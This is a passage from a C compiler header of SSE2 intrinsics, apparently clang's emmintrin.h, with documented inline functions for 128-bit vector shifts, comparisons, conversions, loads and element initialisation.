///    in operand \a __a.
/// \returns A 128-bit integer vector containing the left-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_slli_epi16(__m128i __a,
                                                            int __count) {
  return (__m128i)__builtin_ia32_psllwi128((__v8hi)__a, __count);
}

/// Left-shifts each 16-bit value in the 128-bit integer vector operand
///    by the specified number of bits. Low-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSLLW / PSLLW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to left-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the left-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sll_epi16(__m128i __a,
                                                           __m128i __count) {
  return (__m128i)__builtin_ia32_psllw128((__v8hi)__a, (__v8hi)__count);
}

/// Left-shifts each 32-bit value in the 128-bit integer vector operand
///    by the specified number of bits. Low-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSLLD / PSLLD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to left-shift each value
///    in operand \a __a.
/// \returns A 128-bit integer vector containing the left-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_slli_epi32(__m128i __a,
                                                            int __count) {
  return (__m128i)__builtin_ia32_pslldi128((__v4si)__a, __count);
}

/// Left-shifts each 32-bit value in the 128-bit integer vector operand
///    by the specified number of bits. Low-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSLLD / PSLLD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to left-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the left-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sll_epi32(__m128i __a,
                                                           __m128i __count) {
  return (__m128i)__builtin_ia32_pslld128((__v4si)__a, (__v4si)__count);
}

/// Left-shifts each 64-bit value in the 128-bit integer vector operand
///    by the specified number of bits. Low-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSLLQ / PSLLQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to left-shift each value
///    in operand \a __a.
/// \returns A 128-bit integer vector containing the left-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_slli_epi64(__m128i __a,
                                                            int __count) {
  return __builtin_ia32_psllqi128((__v2di)__a, __count);
}

/// Left-shifts each 64-bit value in the 128-bit integer vector operand
///    by the specified number of bits. Low-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSLLQ / PSLLQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to left-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the left-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sll_epi64(__m128i __a,
                                                           __m128i __count) {
  return __builtin_ia32_psllq128((__v2di)__a, (__v2di)__count);
}

/// Right-shifts each 16-bit value in the 128-bit integer vector operand
///    by the specified number of bits. High-order bits are filled with the sign
///    bit of the initial value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRAW / PSRAW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to right-shift each value
///    in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srai_epi16(__m128i __a,
                                                            int __count) {
  return (__m128i)__builtin_ia32_psrawi128((__v8hi)__a, __count);
}

/// Right-shifts each 16-bit value in the 128-bit integer vector operand
///    by the specified number of bits. High-order bits are filled with the sign
///    bit of the initial value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRAW / PSRAW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to right-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sra_epi16(__m128i __a,
                                                           __m128i __count) {
  return (__m128i)__builtin_ia32_psraw128((__v8hi)__a, (__v8hi)__count);
}

/// Right-shifts each 32-bit value in the 128-bit integer vector operand
///    by the specified number of bits. High-order bits are filled with the sign
///    bit of the initial value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRAD / PSRAD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to right-shift each value
///    in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srai_epi32(__m128i __a,
                                                            int __count) {
  return (__m128i)__builtin_ia32_psradi128((__v4si)__a, __count);
}

/// Right-shifts each 32-bit value in the 128-bit integer vector operand
///    by the specified number of bits. High-order bits are filled with the sign
///    bit of the initial value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRAD / PSRAD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to right-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_sra_epi32(__m128i __a,
                                                           __m128i __count) {
  return (__m128i)__builtin_ia32_psrad128((__v4si)__a, (__v4si)__count);
}

/// Right-shifts the 128-bit integer vector operand by the specified
///    number of bytes. High-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// \code
/// __m128i _mm_srli_si128(__m128i a, const int imm);
/// \endcode
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRLDQ / PSRLDQ &lt;/c&gt; instruction.
///
/// \param a
///    A 128-bit integer vector containing the source operand.
/// \param imm
///    An immediate value specifying the number of bytes to right-shift operand
///    \a a.
/// \returns A 128-bit integer vector containing the right-shifted value.
#define _mm_srli_si128(a, imm)                                                 \
  ((__m128i)__builtin_ia32_psrldqi128_byteshift((__v2di)(__m128i)(a),          \
                                                (int)(imm)))

#define _mm_bsrli_si128(a, imm)                                                \
  ((__m128i)__builtin_ia32_psrldqi128_byteshift((__v2di)(__m128i)(a),          \
                                                (int)(imm)))

/// Right-shifts each of 16-bit values in the 128-bit integer vector
///    operand by the specified number of bits. High-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRLW / PSRLW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to right-shift each value
///    in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srli_epi16(__m128i __a,
                                                            int __count) {
  return (__m128i)__builtin_ia32_psrlwi128((__v8hi)__a, __count);
}

/// Right-shifts each of 16-bit values in the 128-bit integer vector
///    operand by the specified number of bits. High-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRLW / PSRLW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to right-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srl_epi16(__m128i __a,
                                                           __m128i __count) {
  return (__m128i)__builtin_ia32_psrlw128((__v8hi)__a, (__v8hi)__count);
}

/// Right-shifts each of 32-bit values in the 128-bit integer vector
///    operand by the specified number of bits. High-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRLD / PSRLD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to right-shift each value
///    in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srli_epi32(__m128i __a,
                                                            int __count) {
  return (__m128i)__builtin_ia32_psrldi128((__v4si)__a, __count);
}

/// Right-shifts each of 32-bit values in the 128-bit integer vector
///    operand by the specified number of bits. High-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRLD / PSRLD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to right-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srl_epi32(__m128i __a,
                                                           __m128i __count) {
  return (__m128i)__builtin_ia32_psrld128((__v4si)__a, (__v4si)__count);
}

/// Right-shifts each of 64-bit values in the 128-bit integer vector
///    operand by the specified number of bits. High-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRLQ / PSRLQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    An integer value specifying the number of bits to right-shift each value
///    in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srli_epi64(__m128i __a,
                                                            int __count) {
  return __builtin_ia32_psrlqi128((__v2di)__a, __count);
}

/// Right-shifts each of 64-bit values in the 128-bit integer vector
///    operand by the specified number of bits. High-order bits are cleared.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPSRLQ / PSRLQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector containing the source operand.
/// \param __count
///    A 128-bit integer vector in which bits [63:0] specify the number of bits
///    to right-shift each value in operand \a __a.
/// \returns A 128-bit integer vector containing the right-shifted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_srl_epi64(__m128i __a,
                                                           __m128i __count) {
  return __builtin_ia32_psrlq128((__v2di)__a, (__v2di)__count);
}

/// Compares each of the corresponding 8-bit values of the 128-bit
///    integer vectors for equality.
///
///    Each comparison returns 0x0 for false, 0xFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPEQB / PCMPEQB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmpeq_epi8(__m128i __a,
                                                            __m128i __b) {
  return (__m128i)((__v16qi)__a == (__v16qi)__b);
}

/// Compares each of the corresponding 16-bit values of the 128-bit
///    integer vectors for equality.
///
///    Each comparison returns 0x0 for false, 0xFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPEQW / PCMPEQW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmpeq_epi16(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)((__v8hi)__a == (__v8hi)__b);
}

/// Compares each of the corresponding 32-bit values of the 128-bit
///    integer vectors for equality.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPEQD / PCMPEQD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmpeq_epi32(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)((__v4si)__a == (__v4si)__b);
}

/// Compares each of the corresponding signed 8-bit values of the 128-bit
///    integer vectors to determine if the values in the first operand are
///    greater than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPGTB / PCMPGTB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmpgt_epi8(__m128i __a,
                                                            __m128i __b) {
  /* This function always performs a signed comparison, but __v16qi is a char
     which may be signed or unsigned, so use __v16qs. */
  return (__m128i)((__v16qs)__a &gt; (__v16qs)__b);
}

/// Compares each of the corresponding signed 16-bit values of the
///    128-bit integer vectors to determine if the values in the first operand
///    are greater than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPGTW / PCMPGTW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmpgt_epi16(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)((__v8hi)__a &gt; (__v8hi)__b);
}

/// Compares each of the corresponding signed 32-bit values of the
///    128-bit integer vectors to determine if the values in the first operand
///    are greater than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPGTD / PCMPGTD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmpgt_epi32(__m128i __a,
                                                             __m128i __b) {
  return (__m128i)((__v4si)__a &gt; (__v4si)__b);
}

/// Compares each of the corresponding signed 8-bit values of the 128-bit
///    integer vectors to determine if the values in the first operand are less
///    than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPGTB / PCMPGTB &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmplt_epi8(__m128i __a,
                                                            __m128i __b) {
  return _mm_cmpgt_epi8(__b, __a);
}

/// Compares each of the corresponding signed 16-bit values of the
///    128-bit integer vectors to determine if the values in the first operand
///    are less than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPGTW / PCMPGTW &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmplt_epi16(__m128i __a,
                                                             __m128i __b) {
  return _mm_cmpgt_epi16(__b, __a);
}

/// Compares each of the corresponding signed 32-bit values of the
///    128-bit integer vectors to determine if the values in the first operand
///    are less than those in the second operand.
///
///    Each comparison returns 0x0 for false, 0xFFFFFFFF for true.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VPCMPGTD / PCMPGTD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \param __b
///    A 128-bit integer vector.
/// \returns A 128-bit integer vector containing the comparison results.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cmplt_epi32(__m128i __a,
                                                             __m128i __b) {
  return _mm_cmpgt_epi32(__b, __a);
}

#ifdef __x86_64__
/// Converts a 64-bit signed integer value from the second operand into a
///    double-precision value and returns it in the lower element of a [2 x
///    double] vector; the upper element of the returned vector is copied from
///    the upper element of the first operand.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTSI2SD / CVTSI2SD &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The upper 64 bits of this operand are
///    copied to the upper 64 bits of the destination.
/// \param __b
///    A 64-bit signed integer operand containing the value to be converted.
/// \returns A 128-bit vector of [2 x double] whose lower 64 bits contain the
///    converted value of the second operand. The upper 64 bits are copied from
///    the upper 64 bits of the first operand.
static __inline__ __m128d __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtsi64_sd(__m128d __a, long long __b) {
  __a[0] = __b;
  return __a;
}

/// Converts the first (lower) element of a vector of [2 x double] into a
///    64-bit signed integer value.
///
///    If the converted value does not fit in a 64-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTSD2SI / CVTSD2SI &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower 64 bits are used in the
///    conversion.
/// \returns A 64-bit signed integer containing the converted value.
static __inline__ long long __DEFAULT_FN_ATTRS _mm_cvtsd_si64(__m128d __a) {
  return __builtin_ia32_cvtsd2si64((__v2df)__a);
}

/// Converts the first (lower) element of a vector of [2 x double] into a
///    64-bit signed truncated (rounded toward zero) integer value.
///
///    If a converted value does not fit in a 64-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTTSD2SI / CVTTSD2SI &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [2 x double]. The lower 64 bits are used in the
///    conversion.
/// \returns A 64-bit signed integer containing the converted value.
static __inline__ long long __DEFAULT_FN_ATTRS _mm_cvttsd_si64(__m128d __a) {
  return __builtin_ia32_cvttsd2si64((__v2df)__a);
}
#endif

/// Converts a vector of [4 x i32] into a vector of [4 x float].
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTDQ2PS / CVTDQ2PS &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit integer vector.
/// \returns A 128-bit vector of [4 x float] containing the converted values.
static __inline__ __m128 __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_cvtepi32_ps(__m128i __a) {
  return (__m128) __builtin_convertvector((__v4si)__a, __v4sf);
}

/// Converts a vector of [4 x float] into a vector of [4 x i32].
///
///    If a converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTPS2DQ / CVTPS2DQ &lt;/c&gt; instruction.
///
/// \param __a
///    A 128-bit vector of [4 x float].
/// \returns A 128-bit integer vector of [4 x i32] containing the converted
///    values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cvtps_epi32(__m128 __a) {
  return (__m128i)__builtin_ia32_cvtps2dq((__v4sf)__a);
}

/// Converts a vector of [4 x float] into four signed truncated (rounded toward
///    zero) 32-bit integers, returned in a vector of [4 x i32].
///
///    If a converted value does not fit in a 32-bit integer, raises a
///    floating-point invalid exception. If the exception is masked, returns
///    the most negative integer.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VCVTTPS2DQ / CVTTPS2DQ &lt;/c&gt;
///   instruction.
///
/// \param __a
///    A 128-bit vector of [4 x float].
/// \returns A 128-bit vector of [4 x i32] containing the converted values.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cvttps_epi32(__m128 __a) {
  return (__m128i)__builtin_ia32_cvttps2dq((__v4sf)__a);
}

/// Returns a vector of [4 x i32] where the lowest element is the input
///    operand and the remaining elements are zero.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVD / MOVD &lt;/c&gt; instruction.
///
/// \param __a
///    A 32-bit signed integer operand.
/// \returns A 128-bit vector of [4 x i32].
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cvtsi32_si128(int __a) {
  return __extension__(__m128i)(__v4si){__a, 0, 0, 0};
}

/// Returns a vector of [2 x i64] where the lower element is the input
///    operand and the upper element is zero.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVQ / MOVQ &lt;/c&gt; instruction
/// in 64-bit mode.
///
/// \param __a
///    A 64-bit signed integer operand containing the value to be converted.
/// \returns A 128-bit vector of [2 x i64] containing the converted value.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_cvtsi64_si128(long long __a) {
  return __extension__(__m128i)(__v2di){__a, 0};
}

/// Moves the least significant 32 bits of a vector of [4 x i32] to a
///    32-bit signed integer value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVD / MOVD &lt;/c&gt; instruction.
///
/// \param __a
///    A vector of [4 x i32]. The least significant 32 bits are moved to the
///    destination.
/// \returns A 32-bit signed integer containing the moved value.
static __inline__ int __DEFAULT_FN_ATTRS _mm_cvtsi128_si32(__m128i __a) {
  __v4si __b = (__v4si)__a;
  return __b[0];
}

/// Moves the least significant 64 bits of a vector of [2 x i64] to a
///    64-bit signed integer value.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVQ / MOVQ &lt;/c&gt; instruction.
///
/// \param __a
///    A vector of [2 x i64]. The least significant 64 bits are moved to the
///    destination.
/// \returns A 64-bit signed integer containing the moved value.
static __inline__ long long __DEFAULT_FN_ATTRS _mm_cvtsi128_si64(__m128i __a) {
  return __a[0];
}

/// Moves packed integer values from an aligned 128-bit memory location
///    to elements in a 128-bit integer vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVDQA / MOVDQA &lt;/c&gt; instruction.
///
/// \param __p
///    An aligned pointer to a memory location containing integer values.
/// \returns A 128-bit integer vector containing the moved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS
_mm_load_si128(__m128i const *__p) {
  return *__p;
}

/// Moves packed integer values from an unaligned 128-bit memory location
///    to elements in a 128-bit integer vector.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVDQU / MOVDQU &lt;/c&gt; instruction.
///
/// \param __p
///    A pointer to a memory location containing integer values.
/// \returns A 128-bit integer vector containing the moved values.
static __inline__ __m128i __DEFAULT_FN_ATTRS
_mm_loadu_si128(__m128i_u const *__p) {
  struct __loadu_si128 {
    __m128i_u __v;
  } __attribute__((__packed__, __may_alias__));
  return ((const struct __loadu_si128 *)__p)-&gt;__v;
}

/// Returns a vector of [2 x i64] where the lower element is taken from
///    the lower element of the operand, and the upper element is zero.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic corresponds to the &lt;c&gt; VMOVQ / MOVQ &lt;/c&gt; instruction.
///
/// \param __p
///    A 128-bit vector of [2 x i64]. Bits [63:0] are written to bits [63:0] of
///    the destination.
/// \returns A 128-bit vector of [2 x i64]. The lower order bits contain the
///    moved value. The higher order bits are cleared.
static __inline__ __m128i __DEFAULT_FN_ATTRS
_mm_loadl_epi64(__m128i_u const *__p) {
  struct __mm_loadl_epi64_struct {
    long long __u;
  } __attribute__((__packed__, __may_alias__));
  return __extension__(__m128i){
      ((const struct __mm_loadl_epi64_struct *)__p)-&gt;__u, 0};
}

/// Generates a 128-bit vector of [4 x i32] with unspecified content.
///    This could be used as an argument to another intrinsic function where the
///    argument is required but the value is not actually used.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic has no corresponding instruction.
///
/// \returns A 128-bit vector of [4 x i32] with unspecified content.
static __inline__ __m128i __DEFAULT_FN_ATTRS _mm_undefined_si128(void) {
  return (__m128i)__builtin_ia32_undef128();
}

/// Initializes both 64-bit values in a 128-bit vector of [2 x i64] with
///    the specified 64-bit integer values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __q1
///    A 64-bit integer value used to initialize the upper 64 bits of the
///    destination vector of [2 x i64].
/// \param __q0
///    A 64-bit integer value used to initialize the lower 64 bits of the
///    destination vector of [2 x i64].
/// \returns An initialized 128-bit vector of [2 x i64] containing the values
///    provided in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_set_epi64x(long long __q1, long long __q0) {
  return __extension__(__m128i)(__v2di){__q0, __q1};
}

/// Initializes both 64-bit values in a 128-bit vector of [2 x i64] with
///    the specified 64-bit integer values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __q1
///    A 64-bit integer value used to initialize the upper 64 bits of the
///    destination vector of [2 x i64].
/// \param __q0
///    A 64-bit integer value used to initialize the lower 64 bits of the
///    destination vector of [2 x i64].
/// \returns An initialized 128-bit vector of [2 x i64] containing the values
///    provided in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_set_epi64(__m64 __q1, __m64 __q0) {
  return _mm_set_epi64x((long long)__q1[0], (long long)__q0[0]);
}

/// Initializes the 32-bit values in a 128-bit vector of [4 x i32] with
///    the specified 32-bit integer values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __i3
///    A 32-bit integer value used to initialize bits [127:96] of the
///    destination vector.
/// \param __i2
///    A 32-bit integer value used to initialize bits [95:64] of the destination
///    vector.
/// \param __i1
///    A 32-bit integer value used to initialize bits [63:32] of the destination
///    vector.
/// \param __i0
///    A 32-bit integer value used to initialize bits [31:0] of the destination
///    vector.
/// \returns An initialized 128-bit vector of [4 x i32] containing the values
///    provided in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR _mm_set_epi32(int __i3,
                                                                     int __i2,
                                                                     int __i1,
                                                                     int __i0) {
  return __extension__(__m128i)(__v4si){__i0, __i1, __i2, __i3};
}

/// Initializes the 16-bit values in a 128-bit vector of [8 x i16] with
///    the specified 16-bit integer values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __w7
///    A 16-bit integer value used to initialize bits [127:112] of the
///    destination vector.
/// \param __w6
///    A 16-bit integer value used to initialize bits [111:96] of the
///    destination vector.
/// \param __w5
///    A 16-bit integer value used to initialize bits [95:80] of the destination
///    vector.
/// \param __w4
///    A 16-bit integer value used to initialize bits [79:64] of the destination
///    vector.
/// \param __w3
///    A 16-bit integer value used to initialize bits [63:48] of the destination
///    vector.
/// \param __w2
///    A 16-bit integer value used to initialize bits [47:32] of the destination
///    vector.
/// \param __w1
///    A 16-bit integer value used to initialize bits [31:16] of the destination
///    vector.
/// \param __w0
///    A 16-bit integer value used to initialize bits [15:0] of the destination
///    vector.
/// \returns An initialized 128-bit vector of [8 x i16] containing the values
///    provided in the operands.
static __inline__ __m128i __DEFAULT_FN_ATTRS_CONSTEXPR
_mm_set_epi16(short __w7, short __w6, short __w5, short __w4, short __w3,
              short __w2, short __w1, short __w0) {
  return __extension__(__m128i)(__v8hi){__w0, __w1, __w2, __w3,
                                        __w4, __w5, __w6, __w7};
}

/// Initializes the 8-bit values in a 128-bit vector of [16 x i8] with
///    the specified 8-bit integer values.
///
/// \headerfile &lt;x86intrin.h&gt;
///
/// This intrinsic is a utility function and does not correspond to a specific
///    instruction.
///
/// \param __b15
///    Initializes bits [127:120] of the destination vector.
/// \param __b14
///    Initializes bits [119:112] of the destination vector.
/// \param __b13
///    Initializes bits [111:104] of the destination vector.
/// \param __b12
///    Initializes bits [103:96] of the destination vector.
/// \param __b11
///    Initializes bits [95:88] of the destination vector.
/// \param __b10
///    Initializes bits [87:80] of the destination vector.
/// \param __b9
///    Initializes bits [79:72] of the destination vector.
/// \param __b8
///    Initializes bits [71:64] of the destination vector.
/// \param __b7
///    Initializes bits [63:56] of the destination vector.
/// \param __b6
///    Initializes bits [55:48] of the destination vector.
/// \param __b5
///    Initializes bits [47:40] of the destination vector.
/// \param __b4
///    Initializes bits [39:32] of the destination vector.
/// \param __b3
///    Initializes bits [31:24] of the destination vector.
/// \param __b2
///    Initializes bits [23:16] of the destination vector.
/// \param __b1
///    Initializes bits [15:8] of the destination vector.
/// \param __b0
///    Initializes bits [7:0] of the destination vector.
/// \returns An initialized 128-bit vector of [16 x i8] containing the values
///    provided in the operands.
